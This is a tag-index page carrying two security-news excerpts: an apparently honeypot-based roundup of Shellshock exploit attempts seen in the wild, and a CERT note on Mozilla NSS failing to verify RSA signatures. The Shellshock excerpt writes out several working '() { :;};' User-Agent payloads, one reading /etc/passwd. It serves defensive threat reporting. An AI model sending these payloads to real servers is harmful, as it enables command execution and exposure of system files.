Tagged: intel

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th) 0

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far: 1 – Simple “vulnerability checks” that used custom User-Agents: () { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a; () { :;}; echo ‘Shellshock: Vulnerable’ () { :;};echo content-type:text/plain;echo;echo [random string];echo;exit () { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Co ntent-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi This one is a bit different. It includes the tested URL as user agent

VU#772676: Mozilla Network Security Services (NSS) fails to properly verify RSA signatures 0

VU#772676: Mozilla Network Security Services (NSS) fails to properly verify RSA signatures

Vulnerability Note VU#772676 Mozilla Network Security Services (NSS) fails to properly verify RSA signatures Original Release date: 24 Sep 2014 | Last revised: 24 Sep 2014 Overview The Mozilla Network Security Services (NSS) library fails to properly verify RSA signatures due to incorrect ASN.1 parsing of DigestInfo. This vulnerability may allow an attacker to forge a RSA signature, such as a SSL certificate. Description CWE-295 : Improper Certificate Validation RSA signatures are used to authenticate the source of a message.